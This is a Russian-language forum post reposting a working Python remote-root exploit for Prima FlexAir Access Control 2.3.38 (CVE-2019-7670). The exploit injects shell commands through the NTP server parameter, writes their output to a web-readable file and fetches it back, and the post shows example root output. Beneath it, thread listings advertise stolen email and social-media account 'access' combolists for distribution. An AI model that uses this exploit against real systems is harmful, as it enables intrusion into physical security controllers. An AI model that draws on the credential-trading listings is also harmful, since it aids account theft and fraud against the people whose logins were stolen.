Интересно - Prima FlexAir Access Control 2.3.38 - Remote Code Execution

GhosTM@n

Original poster

Pro Member

27.03.2020

# Exploit Title: Prima FlexAir Access Control 2.3.38 - Remote Code Execution
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: LiquidWorm
# Vendor Homepage:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

# Software Link:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

# Version: 2.3.38
# Tested on: NA
# CVE : CVE-2019-7670

#!/usr/bin/env python
#
# Authenticated Remote Root Exploit for Prima FlexAir Access Control 2.3.38
# via Command Injection in SetNTPServer request, Server parameter.
#
# CVE: CVE-2019-7670
# Advisory:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

# Paper:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

#
# By Gjoko 'LiquidWorm' Krstic
#
# 18.01.2019
#
################################################## ##########################
#
# $ python ntpcmdinj.py
# [+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]
# [+] Example: python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

10167847 whoami
#
# $ python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

11339284 "uname -a"
# Linux Alpha 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
#
# $ python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

11339284 id
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
#
################################################## ##########################
#

import requests
import sys#####

if len(sys.argv) < 4:
print '[+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]'
print '[+] Example: python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

10167847 whoami\n'
sys.exit()

host = sys.argv[1]
sessionid = sys.argv[2]
commando = sys.argv[3]

url = host+"/bin/sysfcgi.fx"

headers = {"Session-ID" : sessionid, # Muy importante!
"User-Agent" : "Dj/Ole",
"Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8",
"Accept" : "text/html, */*; q=0.01",
"Session-Pc" : "2",
"X-Requested-With" : "XMLHttpRequest",
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9"}

payload = ("<requests><request name="SetNTPServer">"
"<param name="Server" value="2.europe.p"
"ool.ntp.org;"+commando+">/www/pages/ap"
"p/images/logos/stage.txt|"/></request></"
"requests>")

requests.post(url, headers=headers, data=payload)

e = requests.get(host+"/app/images/logos/stage.txt")
print e.text

Автор	Заголовок	Раздел	Ответы	Дата
M	Valid 16 K Fuuuuuul Valid DE Access 16.09	Раздача email	0	Сегодня в 21:17
M	Valid 13K FRESH EU FULL VALID MAIL ACCESS 16.09	Раздача email	0	Сегодня в 19:54
M	Valid 18k FULL VALID MAIL ACCESS MIX 16.09	Раздача email	0	Сегодня в 16:39
M	Valid Full Valid Mail Access Mix 16.09	Раздача email	0	Сегодня в 13:49
	MIX Full Valid MAil Access	Раздача email	0	Сегодня в 05:45
M	Valid 60k EU USA FRESH MAIL ACCESS Mix 15.09 CHECK NOW!	Раздача email	1	Вчера в 20:22
M	Valid Full Valid Mail Access mix 14.09	Раздача email	0	Суббота в 19:06
M	Valid Sooo Fresh Mail Access Mix Check Now 13.09	Раздача email	0	Пятница в 19:49
M	Valid FRESH {USA $ EU} MAIL ACCESS Byy Mega 13.09	Раздача email	0	Пятница в 18:49
M	Valid 387 X Fresh Hotmail Access 13.09	Раздача email	0	Пятница в 17:45
M	Valid 387 X Fresh Hotmail Access 13.09	Раздача email	0	Пятница в 17:23
	MIX Good email +access Combo eu	Раздача email	0	Четверг в 15:59
M	Valid EU USA FRESH MAil Access By Mega 11.09	Раздача email	0	Четверг в 00:08
M	Valid USA EU Mail Access Mix Byy MaegaCloud 11.09	Раздача email	0	Среда в 11:46
	MIX USA,DE,FR,IT MAILS ACCESS	Раздача email	0	Среда в 05:53
	MIX Mail Access Combo EU mix	Раздача email	0	Вторник в 16:50
M	Zabugor Fresh So Valid Mail Access USA $ Ua 10.09	Раздача email	0	Вторник в 16:20
	MIX Good email Access Combo EU mix	Раздача email	0	Вторник в 07:07
M	Valid 396X Full Access HOTMAIL Byy Mega 09.09	Раздача email	0	09.09.2024
M	Valid Soooo Fresh UE USA Mail Access 09.09	Раздача email	0	09.09.2024
	MIX Good email combo EU Access	Раздача email	0	08.09.2024
	MIX Good email Access Combo EU	Раздача email	0	08.09.2024
M	Valid 252 Fresh Hotmail Access (Oll HITS) 07.09	Раздача email	0	07.09.2024
M	Valid Sooo Fresh Mail Access Mix By Mega	Раздача email	0	07.09.2024
	MIX 16 Good email access EU combo	Раздача email	0	06.09.2024
	MIX MAIL ACCESS USA	Раздача email	0	05.09.2024
	MIX Combo Mail Access	Раздача email	0	04.09.2024
M	Valid USA EU FRESH MAIL ACCESS 28.08	Раздача email	0	28.08.2024
	MIX 100k x15 mix mail access	Раздача email	0	13.08.2024
	MIX Fresh USA MAIL ACCESS + hotmail	Раздача email	0	09.08.2024
	MIX Base Goode email Mail access Combo	Раздача email	0	13.07.2024
	MIX Fresh Valid Mail Access Mix combo	Раздача email	0	11.07.2024
	MIX Good email Mail access Combo	Раздача email	0	10.07.2024
	MIX FRESH_40k lines Access Combo mix	Раздача email	0	10.07.2024
	Zabugor 40 k lines USA EU MAIL ACCESS	Раздача email	0	01.07.2024
	MIX 990K Mixed Domains mail access-Combolist	Раздача email	0	21.06.2024
	MIX Fresh Mail Access Byy Mega	Раздача email	0	05.06.2024
	MIX 40k Fresh Valid Mail Access Combo mix	Раздача email	1	25.05.2024
	MIX 60k UHQ Valide Mail Access Mixed Europa Combolist	Раздача email	0	10.05.2024
	MIX 50k UHQ Valide-Mail Access Europa Combolist	Раздача email	0	10.05.2024
	MIX 10k UHQ Valide Mail Access Europa Combolist	Раздача email	0	08.05.2024
	MIX Soo Fresh Mail Access Mix	Раздача email	0	26.04.2024
N	MIX AMAZON ACCESS + BALANCE	Раздача email	0	12.04.2024
N	MIX TINDER ACCESS	Раздача email	0	09.04.2024
N	MIX INSTAGRAM ACCESS	Раздача email	1	09.04.2024
N	MIX TINDER ACCESS	Раздача email	0	03.04.2024
N	MIX [[email protected]] ACCESS	Раздача email	0	30.03.2024
N	MIX FACEBOOK ACCESS	Раздача email	0	30.03.2024
N	MIX INSTAGRAM ACCESS	Раздача email	0	29.03.2024
N	MIX MAIL ACCESS FACEBOOK	Раздача email	1	29.03.2024

Интересно Prima FlexAir Access Control 2.3.38 - Remote Code Execution

GhosTM@n

Название темы